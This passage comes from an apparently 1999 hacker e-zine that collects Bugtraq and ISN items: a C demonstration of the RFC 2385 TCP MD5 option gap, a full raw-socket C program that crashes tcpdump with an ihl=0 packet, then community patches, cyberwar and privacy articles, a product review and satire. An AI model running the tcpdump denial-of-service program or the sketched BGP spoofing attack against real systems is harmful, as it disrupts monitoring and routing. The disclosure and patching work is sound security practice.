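    memset(h, 0, TCP_FIXED_HDR);
    put16(h, sport);  put16(h + 2, dport);
    put32(h + 4, seq);  put32(h + 8, ack);
    h[12] = (uint8_t)(((TCP_FIXED_HDR + optlen) / 4) << 4);   /* data offset */
    h[13] = flags;
    put16(h + 14, win);  put16(h + 16, cksum);    /* urgent pointer stays 0 */
}

/* Exactly the bytes RFC 2385 section 2.0 feeds to MD5, in order: pseudo-header
 * (src, dst, zero, protocol 6, segment length); TCP header excluding options,
 * checksum assumed zero; segment data; the shared key. Option bytes are never
 * copied: that is the gap the post describes. Returns 0 if out is too small. */
size_t rfc2385_mac_input(const struct tcp_seg *s, const uint8_t *key, size_t keylen,
                         uint8_t *out, size_t outlen)
{
    size_t seglen = TCP_FIXED_HDR + s->optlen + s->datalen;
    uint8_t *p = out;
    if (12 + TCP_FIXED_HDR + s->datalen + keylen > outlen || seglen > 0xffff) return 0;
    put32(p, s->src_ip);  put32(p + 4, s->dst_ip);
    p[8] = 0;  p[9] = 6;                        /* zero pad, IPPROTO_TCP */
    put16(p + 10, (uint16_t)seglen);            /* length does include options */
    p += 12;
    memcpy(p, s->hdr, TCP_FIXED_HDR);
    p[16] = p[17] = 0;                          /* checksum field zeroed */
    p += TCP_FIXED_HDR;
    memcpy(p, s->data, s->datalen);  p += s->datalen;
    memcpy(p, key, keylen);          p += keylen;
    return (size_t)(p - out);
}

/* 1 if both segments would get the identical MD5 signature under one key. */
int same_mac_input(const struct tcp_seg *a, const struct tcp_seg *b,
                   const uint8_t *key, size_t keylen)
{
    uint8_t ia[512], ib[512];
    size_t la = rfc2385_mac_input(a, key, keylen, ia, sizeof ia);
    size_t lb = rfc2385_mac_input(b, key, keylen, ib, sizeof ib);
    return la != 0 && la == lb && memcmp(ia, ib, la) == 0;
}

/* Constructed inputs: a shared key, placeholder BGP data and three option sets. */
static const uint8_t KEY[] = "bgp-session-key";
static const uint8_t PAYLOAD[] = "constructed BGP bytes";
static const uint8_t MSS1460[4] = { 2, 4, 0x05, 0xb4 };
static const uint8_t MSS0[4]    = { 2, 4, 0x00, 0x00 };
static const uint8_t MSS_NOP[8] = { 2, 4, 0x05, 0xb4, 1, 1, 1, 1 };

/* Constructed BGP-style segment (port 179, PSH|ACK) carrying the given options. */
static void sample_segment(struct tcp_seg *s, const uint8_t *opts, size_t optlen)
{
    s->src_ip = 0x0a000001u;  s->dst_ip = 0x0a000002u;    /* 10.0.0.1 -> 10.0.0.2 */
    tcp_fixed_header(s->hdr, 179, 40000, 1000, 2000, 0x18, 65535, 0x1234, optlen);
    s->opts = opts;  s->optlen = optlen;
    s->data = PAYLOAD;  s->datalen = sizeof PAYLOAD - 1;
}

/* The post's case: MSS rewritten in place (1460 -> 0, which 4.4BSD internalizes).
 * Same length, so data offset and pseudo-header length stay put. 1 = MAC identical. */
int mss_rewrite_is_invisible(void)
{
    struct tcp_seg a, b;
    sample_segment(&a, MSS1460, sizeof MSS1460);
    sample_segment(&b, MSS0, sizeof MSS0);
    return same_mac_input(&a, &b, KEY, sizeof KEY - 1);
}

/* Counter-case: an appended option moves the data offset and length; 1 = MAC differs. */
int added_option_is_visible(void)
{
    struct tcp_seg a, b;
    sample_segment(&a, MSS1460, sizeof MSS1460);
    sample_segment(&b, MSS_NOP, sizeof MSS_NOP);
    return !same_mac_input(&a, &b, KEY, sizeof KEY - 1);
}

int main(void)
{
    printf("in-place MSS rewrite invisible to the MAC: %d\n", mss_rewrite_is_invisible());
    printf("appended option visible to the MAC:        %d\n", added_option_is_visible());
    return 0;
}
```

Both results are what the post predicts: the signature still verifies on a segment whose option values were altered, which is why it recommends AH (which covers the whole TCP header) instead.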
However, there are several other players in the core router space (e.g.,
Juniper and Torrent/Ericsson) who use 4.4BSD-derived operating systems, and
those have networking stacks which DO use TCP options. In particular, 4.4BSD
processes the TCP MSS, timestamp, and window size options, and includes
enough padding that one might also be able to shuffle things around and slip
something else in.

A possible active attack might be to sniff a TCP packet in transit and to
spoof a version of that same packet with the TCP options changed, in hopes
that the genuine packet will be dropped in transit but the spoofed one will
get through. A quick read of the BSD source indicates that a MSS option's size
of zero will be internalized, which might be one possible attack to try. Such
an attack might be able to adjust TCP parameters to "choke" the TCP
connection; it will be alive and connected, but little to no routing data
would move. That in turn could be used either as a denial of service attack or
to partition groups of routers to make other attacks harder to detect.

I haven't cooked up a real exploit for this because I don't have any of the
routers that would be affected handy in my lab, but I suppose that someone so
inclined could do so given this discussion and some time to experiment.

The (IMO) obvious fix for this problem is to use IPsec's Authentication Header
(AH) and to deprecate the TCP MD5 option. There are several freely available
and viable AH implementations for BSD (including the NRL, OpenBSD, and KAME
ones) and I believe that modern IOS has AH code in it though it's not
currently set up for protecting routing traffic. AH covers all of the TCP
header and options, as well as typically having a better MAC function (the RFC
2385 option builds a MAC by appending the key, which is possibly the weakest
way to do it).

-Craig

-----------------------------------------------------------------------------------

Date: Wed, 16 Jun 1999 22:33:36 -0400
From: Steven M. Bellovin
To: BUGTRAQ@netspace.org
Subject: Re: TCP MD5 option problem

In message <199906141822.SAA05311@inner.net>, Craig Metz writes:
>
> The (IMO) obvious fix for this problem is to use IPsec's Authentication
> Header (AH) and to deprecate the TCP MD5 option. There are several freely
> available and viable AH implementations for BSD (including the NRL, OpenBSD,
> and KAME ones) and I believe that modern IOS has AH code in it though it's not
> currently set up for protecting routing traffic. AH covers all of the TCP
> header and options, as well as typically having a better MAC function (the RFC
> 2385 option builds a MAC by appending the key, which is possibly the weakest
> way to do it).

The RFC 2385 scheme describes a hack that was developed precisely because
IPSEC wasn't ready, and *something* was needed to protect BGP traffic. You're
absolutely right -- no one should use it for any new work.

@HWA

123.0 tcpdump 3.4 bug? (DoS)
~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 1 Jan 1986 16:30:10 +0100
From: badi
To: BUGTRAQ@netspace.org
Subject: tcpdump 3.4 bug?

/*
  tcpdump bug 3.4a? by BLADI (bladi@euskalnet.net);

  On receiving an ip packet with Protocol-4 and ihl=0, tcpdump enters an
  infinite loop within the procedure ip_print() from file print_ip.c

  This happens because the header length (ihl) equals '0' and tcpdump tries
  to print the packet

  I've tried the bug in different OS's

  Linux:
    SuSE 6.x:   K2.0.36   tcpdump consumes all the system memory
                K2.2.5    in less than a minute and hangs the system
                K2.2.9    or sometimes gives an error from the bus
                K2.3.2
                K2.3.5
    RedHat 5.2: K2.?.?    tcpdump makes a segmentation fault to happen
           6.0: K2.2.9    and it sometimes does a coredump
    Debian      K2.2.?    tcpdump makes a segmentation fault to happen
                          and does a coredump
  Freebsd   Segmentation fault & Coredump   Thanks to: wb^3,Cagliostr
  Solaris   Segmentation fault & Coredump   Thanks to: acpizer
  Aix       ?
  Hp-UX     ?
  -------------------------------------------------------------
  These tests have been carried out in loopback mode, given that protocol 4
  won't get through the routers.
  It would be interesting to perform the attack remotely in an intranet.
  But I do not have access to one.
  ------------------------------------------------------------------------------
  Thanks to:
    the channels: #ayuda_irc,#dune,#linux,#networking,#nova and
    #seguridad_informática. from irc.irc-hispano.org
  Special thanks go to: Topo[lb],^Goku^,Yogurcito,Pixie,Void,S|r_|ce,JiJ79,Unscared etc...
  Thanks to Piotr Wilkin for the rip base code ;)
  And big thanks go to TeMpEsT for this translation.
  ------

  I've found two ways of solving the problem

  Solution 1
    execute: tcpdump -s 24

  Solution 2
    Apply this little patch.

diff -r -p /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c
*** /tcpdump-3.4a6/tcpdump-3.4a6/print-ip.c Wed May 28 21:51:45 1997
--- /tcpdump-3.4a7/tcpdump-3.4a6/print-ip.c Tue Oct 27 05:35:27 1998
*************** ip_print(register const u_char *bp, regi
*** 440,446 ****
  (void)printf("%s > %s: ",
  ipaddr_string(&ip->ip_src),
  ipaddr_string(&ip->ip_dst));
- ip_print(cp, len);
  if (! vflag) {
  printf(" (ipip)");
  return;
--- 440,445 ----
*/

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

struct icmp_hdr
{
    struct iphdr iph;
    char text[15];
} encaps;

int in_cksum(int *ptr, int nbytes)
{
    long sum;
    u_short oddbyte, answer;

    sum = 0;
    while (nbytes > 1)
    {
        sum += *ptr++;
        nbytes -= 2;
    }
    if (nbytes == 1)
    {
        oddbyte = 0;
        *((u_char *)&oddbyte) = *(u_char *)ptr;
        sum += oddbyte;
    }
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    answer = ~sum;
    return(answer);
}

struct sockaddr_in sock_open(int socket, char *address,int prt)
{
    struct hostent *host;
    struct sockaddr_in sin;

    if ((host = gethostbyname(address)) == NULL)
    {
        perror("Unable to get host name");
        exit(-1);
    }
    bzero((char *)&sin, sizeof(sin));
    sin.sin_family = PF_INET;
    sin.sin_port = htons(prt);
    bcopy(host->h_addr, (char *)&sin.sin_addr, host->h_length);
    return(sin);
}

void main(int argc, char **argv)
{
    int sock, i,k;
    int on = 1;
    struct sockaddr_in addrs;

    printf("\t\tTCPDumper Ver 0.2 \n\t\t\tBy Bladi\n");
    if (argc < 3)
    {
        printf("Uso: %s \n", argv[0]);
        exit(-1);
    }

    encaps.text[0]=66; encaps.text[1]=76; encaps.text[2]=65; encaps.text[3]=68;
    encaps.text[4]=73; encaps.text[5]=32; encaps.text[6]=84; encaps.text[7]=90;
    encaps.text[8]=32; encaps.text[9]=84; encaps.text[10]=79;encaps.text[11]=32;
    encaps.text[12]=84;encaps.text[13]=79;encaps.text[14]=80;encaps.text[15]=79;

    sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
    {
        perror("Can't set IP_HDRINCL option on socket");
    }
    if (sock < 0)
    {
        exit(-1);
    }
    fflush(stdout);

    addrs = sock_open(sock, argv[2], random() % 255);

    encaps.iph.version = 0;
    encaps.iph.ihl = 0;
    encaps.iph.frag_off = htons(0);
    encaps.iph.id = htons(0x001);
    encaps.iph.protocol = 4;
    encaps.iph.ttl = 146;
    encaps.iph.tot_len = 6574;
    encaps.iph.daddr = addrs.sin_addr.s_addr;
    encaps.iph.saddr = inet_addr(argv[1]);

    printf ("\t DuMpInG %s ---> %s \n",argv[1],argv[2]);

    if (sendto(sock, &encaps, 1204, 0, (struct sockaddr *)&addrs, sizeof(struct sockaddr)) == -1)
    {
        if (errno != ENOBUFS) printf("Error :(\n");
    }
    fflush(stdout);
    close(sock);
}

--------------------------------------------------------------------------------

Date: Thu, 17 Jun 1999 12:19:06 +0100
From: acpizer
To: BUGTRAQ@netspace.org
Subject: Re: tcpdump 3.4 bug?

The given source for killing tcpdump will only work on local networks since
routers drop the bad packet it creates, a more constructive patch for tcpdump
is listed below.

-- snip --
diff -r -p print-ip.orig.c print-ip.c
*** print-ip.orig.c Thu Jun 17 11:24:17 1999
--- print-ip.c Thu Jun 17 14:07:50 1999
*************** ip_print(register const u_char *bp, regi
*** 374,379 ****
--- 374,384 ----
  (void)printf("truncated-ip %d", length);
  return;
  }
+
+ if (ip->ip_hl == 0) {
+ (void)printf("bad ip packet - header length = 0\n");
+ return;
+ }
  hlen = ip->ip_hl * 4;
  len = ntohs(ip->ip_len);
-- snip --

Cheers.

-------------------------------------------------------------------------------
"Probably you've only really grown up, when you can bear not being understood."
Marian Gold /Alphaville

--------------------------------------------------------------------------------

Date: Fri, 18 Jun 1999 13:16:33 +0300
From: Markus Peuhkuri
To: BUGTRAQ@netspace.org
Subject: Re: tcpdump 3.4 bug?

acpizer writes:
> since routers drop the bad packet it creates, a more constructive patch for
...
> + if (ip->ip_hl == 0) {

Actually, as the minimum length is 5*4 bytes that could be as well
"if (ip->ip_hl < 5) {". If it is shorter it is bad anyway.

--
Markus Peuhkuri ! Markus.Peuhkuri@hut.fi ! http://www.iki.fi/puhuri/

--------------------------------------------------------------------------------

Date: Sun, 20 Jun 1999 09:17:32 +0100
From: acpizer
To: BUGTRAQ@netspace.org
Subject: Re: tcpdump 3.4 bug? (final)

Hi again,

Thanks goes to Markus Peuhkuri for pointing out that the minimum length of an
IP packet is actually 20 bytes, (I'm useless w/o a copy of TCP/IP Illustrated
in front of me), anyway, here is a final patch, also don't forget to run
tcpdump with the -v parameter if you want to see the source address of the
offensive packet.

Are the guys at LBL reading bugtraq? (tcpdump on ftp.ee.lbl.gov isn't updated
yet...) maybe they don't think it's a bug since routers drop the packet
anyway, how about attacking machines which run tcpdump locally on the LAN?

*** print-ip.orig.c Thu Jun 17 11:24:17 1999
--- print-ip.c Sun Jun 20 11:04:20 1999
*************** ip_print(register const u_char *bp, regi
*** 440,445 ****
--- 440,451 ----
  (void)printf("%s > %s: ",
  ipaddr_string(&ip->ip_src),
  ipaddr_string(&ip->ip_dst));
+
+ if (ip->ip_hl < 5) {
+ (void)printf("Bad ip-in-ip encapsulation (hl < 5) Possible attack!");
+ return;
+ }
+
  ip_print(cp, len);
  if (! vflag) {
  printf(" (ipip)");

Cheers.

-------------------------------------------------------------------------------
"Probably you've only really grown up, when you can bear not being understood."
Marian Gold /Alphaville

@HWA

124.0 [ISN] A mouse that roars?
~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: William Knowles

http://www.washingtonpost.com/wp-srv/national/dotmil/arkin.htm

A Mouse That Roars?

By William M. Arkin
Special to washingtonpost.com
Monday, June 7, 1999

Last week, Newsweek reported that President Clinton approved a covert
operation in May to find an electronic silver bullet to do what the White House
at the time believed the air war couldn't. According to the report, the CIA
would conduct a cyberwar against Milosevic, specifically going after his
financial assets in banks throughout Europe.

Is the keyboard mightier than the sword? Before Allied Force, the intelligence
agencies held a cyberwar exercise to answer this very question.
At center stage was the Information Operations Technology Center (IOTC),
activated last year and made up of the best cyberwarriors of the U.S.
government. Housed at National Security Agency headquarters at Fort Meade,
Md., IOTC brings together highly secret capabilities: NSA's P42 information
warfare cell, the CIA's Critical Defense Technologies Division, the Pentagon's
"special technology operations."

Military sources familiar with the March demonstration say there is no
question that the keyboard covert operators wowed the Joint Staff with their
computer attack capabilities. But they are adamant in insisting that
cyberbombs are more laboratory technologies than usable weapons. In fact, the
sources point out, the only cyberwar raging is inside the U.S. government
where Washington lawyers and policymakers, military leaders, and official
hackers battle over the value and legality of network attack.

Where's The Bits?
---------------------------------------------------------------------------

The day bombs started falling on Yugoslavia, the Air Force Association
convened a high-level symposium in San Antonio, Tex., to address the status of
information warfare. Washingtonpost.com has obtained a transcript of the
two-day proceeding.

Gen. John Jumper, commander of U.S. Air Forces in Europe, joined the
closed-door session via satellite from his headquarters in Germany. "I have
not had much sleep over the last 48 hours, and I am probably not as sharp or
prepared as I would like to be," he apologized.

Tired or not, the senior air force officer in Europe wasted no time blasting
the bias of information warriors to fight battles solely at the "strategic
level." He was referring to the very sort of effort Newsweek would speculate
about two months later.
"When we hear talk of information warfare," Jumper said, "the mind conjures up notions of taking some country's piece of sacred infrastructure in a way that is hardly relevant to the commander at the operational and tactical level." "I would submit that we are not there with information warfare," he concluded.

Networking Network Attack
----------------------------------------------------------------------------

Brig. Gen. John B. Baker, commander of the Air Intelligence Agency and head of the Pentagon's Joint Command and Control Warfare Center, followed Jumper. "In my hat as the air force component commander for NSA," he warned, "I spend a lot of time working ... on how to exploit what is going on out there in computer networks." But when it comes to going beyond collecting computer transmissions as raw intelligence to actually manipulating and exploiting the "zeroes and ones" for military value, Baker said, "we have a ways to go."

---------------------------------------------------------------------------

Despite all the new information warfare organizations that have been established of late, he lamented that cyberwarriors did not yet have the stature of other warriors: "Effects-based warfare," that is, methods geared to achieve an outcome and not cause traditional damage, lacks the "visually pleasing destruction from an armed bomb." Baker stressed that part of the problem in any kind of computer network attack is the concerns on the part of policy-makers in Washington with regard to legality and "traceability."

Jumper described his experience: "I picture myself around that same targeting table where you have the fighter pilot, the bomber pilot, the special operations people and the information warriors. As you go down the target list, each one takes a turn raising his or her hand saying, 'I can take that target.' When you get to the info warrior, the info warrior says, 'I can take the target, but first I have to go back to Washington and get a finding.'"
Seeking permission invariably results in artificial restrictions and hesitations in attacking targets, Jumper stressed. From a field perspective, he said, the process of seeking the "special" operation cedes too much decision-making to inside the Beltway.

Finding The Way
---------------------------------------------------------------------------

The unusually candid discussions of the institutional and military stumbling blocks to an information warfare future contrast with the Hollywood vision of cyberwar so common in the mainstream media these days. Still, Maj. Gen. Bruce A. "Orville" Wright told the symposium that "Within the area of computer network exploitation, there is tremendous investment, which, with a little bit of fine tuning, can be turned into a computer network attack capability." The IOTC, Wright said, "is a great organization that has a bright future." He should know. As Deputy Director for Information Operations for the Joint Chiefs of Staff, he is the military head of the interagency center and the top cyber-warrior in the U.S. military. But the key word is future. With the shooting war against Yugoslavia over, it should be crystal clear to anyone that exotic American cyberbombs have not aided the effort in any way.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

125.0 [ISN] Product Review: NOVaSTOR DataSAFE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From: "L. Sassaman"

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Product Review: NOVaSTOR DataSAFE
L. Sassaman
6/1/1999

The NOVaSTOR web site (http://data-encryption.com/index.html) makes this bold claim regarding their DataSAFE product: "Password Protect, Compress and Encrypt your Files and Email Protect your data from prying eyes! The DataSAFE family of encryption software stores, transmits and receives electronic files securely. Protect your sensitive files and data from prying eyes, whether on your PC or over the Internet and World Wide Web.
DataSAFE encrypts your data with BLOWFISH or RSA secure algorithms which have never been broken, and can encrypt and protect every type of file on every kind of media."

The benefits of using this software package are clear, according to the company. "DataSAFE is the only encryption software on the market that lets you send secure documents to people who do not have the program." Apparently, for a mere $39.50, one can have a quick, easy way of sending secure files to anyone with a computer.

When using this product, the sender uses the program to generate a .exe file, encrypted with Blowfish, that he then sends as an attachment through email. The recipient does not need to have any additional software on his computer, as the encrypted message runs by itself (popping up a cute safe, which spits out the plain-text when the correct combination is entered.)

Now, obviously, this lacks all the benefits of public key cryptography. (The key, or "combination to the safe", must be delivered to the recipient in some manner deemed secure. We are now back to the days of relying on couriers with hand-cuffed brief-cases for security. The web page steps over this issue, merely saying "you send [the key] separately".) The product offers no identity verification for the author or originator of the file being transferred. In addition, the .exe generated is a potential carrier of virii, and only works on Microsoft systems. (Though a Java version is promised.)

The product white paper (http://data-encryption.com/datasheets/ds_white.html) makes this absurd statement regarding public key cryptography (PKC): "Public key encryption was discarded because it is too difficult to establish key exchange with third party organizations running a variety of computer hardware, mail systems and security programs.
For example, a typical law office needs to be able to send secure documents to a wide range of client organizations, each having their own unique combination of computers, mail and security systems."

PGP, and its free clone released under the GPL, GnuPG, are perfect examples of secure PKC that are easily implemented across a variety of computer hardware, mail systems and security systems. There is an established network of public key servers that is widely used by nearly every combination of software and hardware across the entire Internet. (http://pgp.ai.mit.edu/ is one such server.) DataSAFE, however, is not available except on systems running the correct versions of Microsoft operating systems.

The closing statement on the product white paper offers this explanation for the product's design: "It should be recognized that BLOWFISH is just one of many excellent encryption algorithms. In real life situations the security provided depends much more on the user's ability to make use of the software than the mathematical underpinnings of the encryption engine. The NOVaSTOR DataSAFE strives to be so simple to use that people are willing and able to secure their files."

Granted, the best encryption software in the world is useless if people won't use it. But, in my opinion it is far more dangerous to lure people into a false sense of security. Products like DataSAFE could possibly encourage someone to reveal sensitive material on electronic correspondence that he would otherwise have been reluctant to communicate.

It is my recommendation that DataSAFE not be used by anyone requiring anything more than casual security. The freely available GnuPG (http://www.gnupg.org), and the inexpensive PGP (www.pgp.com) offer the best system for secure email communication available, and should be used by anyone who is concerned about privacy. Products like DataSAFE should be set aside, along with the secret decoder ring from the breakfast cereal box.

L. Sassaman
System Administrator                 | "What's true in our minds is true,
Technology Consultant                |  whether some people know it or not."
icq.. 10735603                       |
pgp.. finger://ns.quickie.net/rabbi  |                     --Robin Williams

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v0.9.7 (GNU/Linux)
Comment: OpenPGP Encrypted Email Preferred.

iD8DBQE3U/MyPYrxsgmsCmoRAthbAJsGLzLS8wCqjnwSLgkZY6lEJN6kUQCeJhwC
H5e+Iquwq/c1GUq6ndZzdPY=
=BN59
-----END PGP SIGNATURE-----

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

126.0 [ISN] Technology a threat to right of privacy Silicon Valley
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Forwarded From: Putrefied Cow

Technology a threat to right of privacy Silicon Valley
(Irish Times; 06/04/99)

Last week, the US Congress requested that its intelligence services provide a detailed report about a global electronic eavesdropping system known as Echelon. They refused. Now Congress is moving to make its request law. Echelon is just one of the emerging uses of technology that is eroding a basic human right, privacy. The system indiscriminately monitors satellite and Internet communications traffic using keyword searches in the case of e-mail, and scanning for certain telephone numbers in the case of mobile phones. The report was requested by Congress's House Committee on Intelligence and specifically asked that the National Security Agency and the Central Intelligence Agency provide an account as to what legal standard they use to monitor US citizens.

Another system, currently in the pipeline, is the EU's Enfopol, a specification that will provide European law enforcement officials with an electronic back door into the computer systems of Internet Service Providers and mobile telecommunications companies.
Furthermore, later this year, the EU plans to introduce new encryption legislation (encryption being a technology that scrambles data so that it cannot be read by eavesdroppers), which may affect people's right to exchange messages that cannot be read by law enforcement.

Indeed, Internet and electronic privacy will be one of the biggest issues affecting citizens in the next century. Unfortunately law makers in Ireland, Europe and the US are staggeringly naive about the effects these new laws, systems and so-called specifications will have on their future. The problem is one of ignorance. Law makers often don't understand technology and don't look far enough into the future to see how Internet and wireless communications will touch virtually every aspect of our lives in the not too distant future.

But why the concern? Police and intelligence services are only trying to catch terrorists, criminals and child pornographers. True, if they are to catch these people they need to be able to track their movements, ensure that they are not shifting large amounts of money into offshore bank accounts and nip their next deadly or grossly illegal plans in the bud. Surely, you couldn't object to that? Unless, of course, you would object to passing a law that would enable police to go through your credit-card receipts without a court order, tap your telephone at will and make a list of every place you visited and every person you talked to, without proper judicial control. Because that is what these systems allow.

Increasingly people are buying goods and services on the Internet. This not only includes a novel from, say, Amazon.com, but banking, share trading and even insurance services. Back-door access to mobile telephone records will not only provide access to conversations but pinpoint the location of the mobile phone and therefore its user.
Furthermore, governments mistakenly believe that their judicial system will protect their citizens from abuses of these new methods of data collection and surveillance. However, perhaps it's not just the local police force that should concern us, but the police force and intelligence agencies of foreign governments. Take the Echelon system, for example: it was established under the UKUSA agreement by the US's National Security Agency and Britain's General Communications Headquarters to monitor the communications of the eastern bloc countries.

While Echelon was designed as a system to monitor spies, according to a recent report prepared for the European Parliament's Scientific and Technology Options Assessment Panel there is evidence that member-countries also use the Echelon system for industrial espionage. The report states that British intelligence routinely collects information such as "company plans, telexes, faxes, and transcribed phone calls," and that the NSA provides weekly reports to the US department of commerce. The report recommends that Europe adopt strong encryption technology rather than restrict it and points out that it is the larger nations that have invested in spying activities, leaving smaller nations vulnerable.

While few could object to these systems to apprehend criminals, there needs to be awareness of exactly what powers they give governments and law enforcement. There also needs to be a way to ensure that they are being used correctly. It has taken centuries to gain the right to privacy; surely we should not throw it away so readily.

-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]

@HWA

-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-
                         T H E   R U M O U R   M I L L
-=--=--=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-=--=-

Rumours:
~~~~~~~

Cartoon Hackers??
~~~~~~~~~~~~~~~~~~

New IRC Network
Contributed by siko
Monday - June 21, 1999. 06:27PM UTC
From www.innerpulse.com

Do you ever experience harsh channel takeovers? Get nuked all day long? Get ridiculous spam directed your way? Hindered by immature skript kids? Want more of the same? Come to Slacknet! You can point your IRC client towards irc.slacknet.org, or irc.callcenterstech.net (server run by siko). Join #slacknet when you connect for all questions, concerns, and propositions.

Slacknet IRC
http://www.slacknet.org

June 22nd 1999
From HNN http://www.hackernews.com/
contributed by delchi

WB Scraps 'Real Hackers' Cartoon

Rumor has it that Warner Brothers and Mattel have scrapped an idea for a new Saturday morning cartoon with a tie-in toy line called "Real Hackers". The defunct storyline was to portray a group of real life hackers in cartoon form, reformed and fighting for good. Amongst the hackers to be represented were 'phiber optik', 'bernie s', 'death veggie', 'emmanuel goldstein' and 'weld pond' as cyber warriors as they fought criminals bent on destroying the internet. It is unknown why Warner Brothers and Mattel scrapped this idea or if it even existed in the first place, but in this hot pre-Christmas marketplace, one can only wonder how long it will be before this ground breaking idea starts making money for somebody.

Kasparov CheckMated?
~~~~~~~~~~~~~~~~~~~~

June 23rd 1999
From HNN http://www.hackernews.com/
contributed by Anonymous

Kasparov CheckMated?

A source close to the BBC has told us that they think the World vs. Kasparov Chess match had been compromised yesterday by cyber intruders. Evidently the "World" playing against Kasparov had numerous Kings on the board at once. HNN has received no confirmation of this report. If anyone knows what really went on we would like to hear it.

AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

*****************************************************************************
*                                                                           *
*      ATTRITION.ORG            http://www.attrition.org                    *
*      ATTRITION.ORG            Advisory Archive, Hacked Page Mirror        *
*      ATTRITION.ORG            DoS Database, Crypto Archive                *
*      ATTRITION.ORG            Sarcasm, Rudeness, and More.                *
*                                                                           *
*****************************************************************************

www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com

One of our sponsors, visit them now www.csoft.net

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to         //
// hwa@press.usmc.net, put AD!
in the subject header please. - Ed //
//////////////////////////////////////////////////////////////////////////////

@HWA

HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~

Don't worry. worry a *lot*

Send in submissions for this section please! .............

www.innerpulse.com is back. here's a couple of ditties from them;

Local Hacker Lays Smack Down on Inferior Hacker
Contributed by siko
Wednesday - June 23, 1999. 04:48PM UTC

The chilling tale of hacker on hacker violence unfolded in the small IRC channel #hackphreak on Undernet this afternoon as a hacker calling himself 'clocker' explained the events. "It all started when this kid who can't possibly have more of an IQ than 80 started telling me about how he was a hacker. I had to smack him in the face. He said Linux was an ISP like AOL." The drama entailed many reactions. Some were in fear for their own safety from this "Hacker Enforcer". One hacker was later accused by clocker of "running windows". The hacker, clocker, was not available for comment. His mother made him clean his room.

Hackers Continue to Retaliate
Contributed by siko
Tuesday - June 22, 1999. 03:42AM UTC

Two new groups have stood up in the battle against the extreme injustice of the FBI raiding several computer hackers that admitted to committing high crimes. Early this morning, minix.closet.jpl.nasa.gov was cracked by a hacker exploiting an unknown hole in the qpopper pop3 daemon. Version 2.43b4 of the mail server was thought to be secure. m0nk3yz 4 L1f3 left the following message on the cracked server:

We are not jsut kids here doing this attakc thign. Their is no reasen for thinking we are young and not dangarous. We will keap hitting every .gov on the NET until the FBI comes crying on they're nees. Fear us.

The second group, Niggaz With Attitude AND Computahz, completed a large portscan of www.fbi.gov.
"I think they left their firewall port open, so we plan on netbussing the router so we can gain access to the lan and audit the internal security removing the firewall and changing the index.html," explained uberklown. "By simply bypassing their network sockets we can go over to commands, drop down to nuke.. and hope from there on out."

Innerpulse caught up with Albert Renford, director of Network Security at the FBI.

INNERPULSE
So when did you first realize you were going to get attacked by skilled crackers from across the globe?

AL RENFORD
Well we first detected a lot of connection attempts to our telnet port. I learned about password security at a trade show I attended in LA and had recently changed my root password from 'sex' to something more difficult. After the rash of failed logins, we began to notice a fluctuation in the amount of connections to port 139 we were getting. Something about oob or something. Weird.

INN
So what would you rate this threat on a scale of 1-10?

AR
Obviously it's a 10. We are dealing with professional system crackers, cracking into servers with loads of sensitive data on them. You can't find exploits anywhere!

IPP
Have you ever visited rootshell.com?

AR
?

Attrition http://www.attrition.org/
Hacker News Network http://www.hackernews.com

Song sung to the tune of "I'm the very model of a modern major general"
from: http://www.harley.com/harley-quotes/unix-sysadmin.html by Harley Hahn

Unix Sysadmin:
I am the very model of a modern Unix Sysadmin,
I've information relevant to programs in slash usr bin,
I know the tricks of emacs and the vi bugs historical,
From a to ZZ upper case, in order categorical;
I'm very well acquainted too with matters of the interface,
